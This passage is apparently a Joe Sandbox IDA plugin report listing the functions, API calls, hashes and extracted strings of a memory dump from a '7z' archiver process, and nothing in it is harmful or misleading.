API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
Instruction ID: aef7306c4a8ba29503055d82c430c4c7f9fbf69626bd2a171a565aedde401be9
Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
Instruction Fuzzy Hash: 0AE04676224640CBE740CF60E400B5AB3A0F388B28F000115DE8A83B54CBBCC054CF40

Function 00B56464 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,?,00B564E7), ref: 00B56475

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
Instruction ID: f5f11c2b4199f687626181ea6c46c8a7bac37b96402f7bb7308d061639fa6f0c
Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
Instruction Fuzzy Hash: B2D012A2702504C5FF554FB2E8543352394AB58F56F9C5090CE158B340EB2988998760

Function 00B58AF4 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 00B58B16

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
Instruction ID: 3f1f0a433edeac1229a6b36fbe921e3e0beecc0e3664999c28a7347dec98a2f1
Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
Instruction Fuzzy Hash: FCD01776614684C6EB008F60E04575AF764F388B64F480004EB8846774CBBCC199CB40

Function 00B526A0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B526C1

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs
String ID:
API String ID: 1795875747-0
Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
Instruction ID: 7c0e882a86ad7830a3039534abfac8691ef186d250f28e8bc85f2458d6e653dc
Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
Instruction Fuzzy Hash: 93D0A9D2700B0982CE109B2AE8003692321FB88BC8F088021DE9E4B318EA2CC2498B00

Function 00B5794C Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE ref: 00B5795E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
Instruction ID: 9b8b91b71a655c4c5486843ae6a908af97cff60e88c594ae69f4d5ee1f91d0f0
Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
Instruction Fuzzy Hash: B8D0A77570990181DB211FB994403242391DB54F75F180350CEB0493E0DF2484968310

Function 00B58BB0 Relevance: 1.5, APIs: 1, Instructions: 8timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE ref: 00B58BB7

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
Instruction ID: f4049b4a7dabf7f7a8015c71d24c1bc1920dddb6c1f6dd5fc36d9b7aa9e357f4
Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
Instruction Fuzzy Hash: C2B09220B12411C2CB0C6722E89232C23616788B21FE1442AC60BE5650CE1C85E94700

Function 00B83D58 Relevance: 1.3, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B83E2A

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ErrorExceptionLastThrowmalloc
String ID:
API String ID: 2114622545-0
Opcode ID: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
Instruction ID: 01d33bea1be92c212430e3d4f99ee72f0d4676daa6895d6571350785d6df194c
Opcode Fuzzy Hash: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
Instruction Fuzzy Hash: E5319C32201F4186DB15AF29E584369B7E1FB89FE1F1845B49F9A07764EF38C956C310

Function 00B7373C Relevance: 1.3, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B737FB

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
Instruction ID: 116ca07cdd274c067c0624735566979fa8340085b4009c4ea013c1383bbb31b5
Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
Instruction Fuzzy Hash: 7921487370424096C728DB2AB840A5A72D4F745FA4F20D269FE7E47784EB38CA42D740

Function 00B79078 Relevance: 1.3, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,00B79B61), ref: 00B7911C

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrowmallocmemmove
String ID:
API String ID: 2847158419-0
Opcode ID: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
Instruction ID: b966159ce8c3161c55a3e5f91313dbe404fe827b523e8d322f6d60fb0b88ba15
Opcode Fuzzy Hash: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
Instruction Fuzzy Hash: 9D216D37202B4495DB11DF1AE91472AB3A0E785FA8F59C265DF6C07394DF39C4A6C740

Function 00B5C90C Relevance: 1.3, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B5C995

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
Instruction ID: 84bd88b19a5c4e6f684c17bcb9fe6e35e96cc9314e5dd95e5ac69e5ffca71386
Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
Instruction Fuzzy Hash: 4D112B627157518ECB328B6CA490328AAD3F740787B5440FADFCA87610D665CCDE9241

Function 00B83EE0 Relevance: 1.3, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00B7419C: free.MSVCRT ref: 00B741B9
Part of subcall function 00B7419C: free.MSVCRT ref: 00B741C5
Part of subcall function 00B7419C: free.MSVCRT ref: 00B741D1
Part of subcall function 00B7419C: free.MSVCRT ref: 00B741DD
Part of subcall function 00B7419C: free.MSVCRT ref: 00B741E6
Part of subcall function 00B7419C: free.MSVCRT ref: 00B741EF
Part of subcall function 00B7419C: free.MSVCRT ref: 00B741F8

free.MSVCRT ref: 00B83F45

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
Instruction ID: 2a4f7fbc44b14835f175f7737aea5b4297de9e741f9773f66a8517faecf0b2fb
Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
Instruction Fuzzy Hash: 67014C73A21790CACB21AF1DC18116DBBA4F759FE83689156EB4907770E732C883C7A1

Function 00B58624 Relevance: 1.3, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B586A9

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
Instruction ID: 1efd327bad793090a60e4c41d3b83487162a411406b81571dc67cb1468f144c7
Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
Instruction Fuzzy Hash: 9401AD7631220086E710CF14C52C35E3BA0B3D1B68F140288DBA80B3D1CB7AC54ECF90

Function 00B5CB78 Relevance: 1.3, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B5CBA8

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
Instruction ID: 818b2dab17af55f80b75575982955b743e3a92bd5d49feecc4701aedf508d1af
Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
Instruction Fuzzy Hash: CAF0EC5231024D4BCB00DF7999C136821E2FB44796F9014B5DF4587602D928CCDD8714

Function 00B5CB34 Relevance: 1.3, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B589D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 00B589EA

GetLastError.KERNEL32 ref: 00B5CB49

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
Instruction ID: 341b7d5fa091b0724abeb18ffd402366025a0781b1646033579a626889fe50d7
Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
Instruction Fuzzy Hash: E5D02B407501988AEB105AF958C233410C3E718713F9014F5DE5BD6203E41C8CCE6229

Function 00B53314 Relevance: 1.3, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00B53339

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
Instruction ID: df18826beef6b853b09cc571df0f4c0776c214ad545573cdbed78c19e9ac7ff1
Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
Instruction Fuzzy Hash: 18D05EAA7516C886CA049B2BD68151DA3219B89FD5718D0749F080B70ACE20C8E58740

Function 00B589D8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 00B589EA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
Instruction ID: 3ed05938d569657fbe9751a3690aa10db586d45bd44724d6adad0ef828290e8c
Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
Instruction Fuzzy Hash: C9D0A77260198580DB261FBEC8403343391E754B75F185350CEB04A2D0DF2489CA8301

Function 00B5CDF4 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5CE0D

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
Instruction ID: 2166b5d2cda0b8a339828f3ddde091d83289321c476f07d570eefdeb07c00686
Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
Instruction Fuzzy Hash: 0BC08C027833480AC90A222B6F8732C02834F8EBD3E4C50E09E481BB52DA548CEA8B00

Non-executed Functions

Function 00B5F1B4 Relevance: 79.1, APIs: 39, Strings: 6, Instructions: 318COMMON

Download Yara Rule

APIs

Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339

free.MSVCRT ref: 00B5F201
free.MSVCRT ref: 00B5F23D

Strings

Unsupported Map data, xrefs: 00B5F464
Incorrect Map command, xrefs: 00B5F206, 00B5F242
Map data error, xrefs: 00B5F58D
Can not open mapping, xrefs: 00B5F33E
Unsupported Map data size, xrefs: 00B5F665
MapViewOfFile error, xrefs: 00B5F3C9

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
API String ID: 1534225298-798110030
Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
Instruction ID: 2590fe03271e5af674f62e737a5279d6016946edc2037b73d4ac2ecbd1922350
Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
Instruction Fuzzy Hash: FCC15072225A4186CB10EF11F89076EB7A1F7D6B91F5411B2EF8A43B69DF78C449CB40

Function 00B82578 Relevance: 45.3, APIs: 36, Instructions: 335COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B82578
free.MSVCRT ref: 00B8257A
free.MSVCRT ref: 00B8258B
free.MSVCRT ref: 00B8259C
free.MSVCRT ref: 00B825AD
free.MSVCRT ref: 00B825BA
free.MSVCRT ref: 00B8279A
free.MSVCRT ref: 00B827A7
free.MSVCRT ref: 00B827B4
free.MSVCRT ref: 00B827C1

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
Instruction ID: 154b90396b0630a25fc402f30da4da5f2539aec006a7b57227ec4185583445c5
Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
Instruction Fuzzy Hash: 67D11B7620AAC485CA34EF26E4606AE77A0F7C6B85F0551D2DF9E53B25CE38C849CB04

Function 00B966A8 Relevance: 43.9, APIs: 12, Strings: 13, Instructions: 131libraryloadertimeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00B966B6
GetProcessTimes.KERNEL32 ref: 00B966E1
memset.MSVCRT ref: 00B9670C
GetModuleHandleW.KERNEL32 ref: 00B96721
GetProcAddress.KERNEL32 ref: 00B96734
LoadLibraryW.KERNEL32 ref: 00B96749
GetProcAddress.KERNEL32 ref: 00B9675E
GetCurrentProcess.KERNEL32 ref: 00B9676C
GetProcAddress.KERNEL32 ref: 00B9678B
GetCurrentProcess.KERNEL32 ref: 00B96799
fputs.MSVCRT ref: 00B9682A
fputs.MSVCRT ref: 00B96864

Strings

GetProcessMemoryInfo, xrefs: 00B96754
Process, xrefs: 00B96880
User , xrefs: 00B9686A
Psapi.dll, xrefs: 00B96742
Virtual , xrefs: 00B9689B
kernel32.dll, xrefs: 00B96711
Physical, xrefs: 00B968C2
QueryProcessCycleTime, xrefs: 00B96781
K32GetProcessMemoryInfo, xrefs: 00B96727
H, xrefs: 00B966FC
Kernel , xrefs: 00B96806
MCycles, xrefs: 00B9685A
Global , xrefs: 00B968A7

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
API String ID: 600854398-319139910
Opcode ID: 4de089bbcb59170ecffb44d8e6b4bb1020c1b67aaf46552131cc09be39bde8ef
Instruction ID: 4c234feb1c61e5e11a68452f451a04bb3fd65c1ae08bccb1a6f9b0ee98a17960
Opcode Fuzzy Hash: 4de089bbcb59170ecffb44d8e6b4bb1020c1b67aaf46552131cc09be39bde8ef
Instruction Fuzzy Hash: 2E517FA5305A8696EE20DBA5F8907A973A0F789B90F444036DE4D83769EF3CC549C750

Function 00B93528 Relevance: 35.5, APIs: 19, Strings: 1, Instructions: 472stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00B935A7

Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4

fputs.MSVCRT ref: 00B935D8
fputs.MSVCRT ref: 00B93609
fputs.MSVCRT ref: 00B936BF
fputs.MSVCRT ref: 00B9373F

Part of subcall function 00B85680: free.MSVCRT ref: 00B85737
Part of subcall function 00B85680: free.MSVCRT ref: 00B85907
Part of subcall function 00B85680: free.MSVCRT ref: 00B85911

free.MSVCRT ref: 00B9370F
fputs.MSVCRT ref: 00B937CB
fputs.MSVCRT ref: 00B9391B
strlen.MSVCRT ref: 00B93929
memset.MSVCRT ref: 00B9395E
fputs.MSVCRT ref: 00B939B1
strlen.MSVCRT ref: 00B939BF
memset.MSVCRT ref: 00B939EE
fputs.MSVCRT ref: 00B93AC1
strlen.MSVCRT ref: 00B93AE4
memset.MSVCRT ref: 00B93B1C
memmove.MSVCRT ref: 00B93B3E
memset.MSVCRT ref: 00B93B56
strlen.MSVCRT ref: 00B93B62

Strings

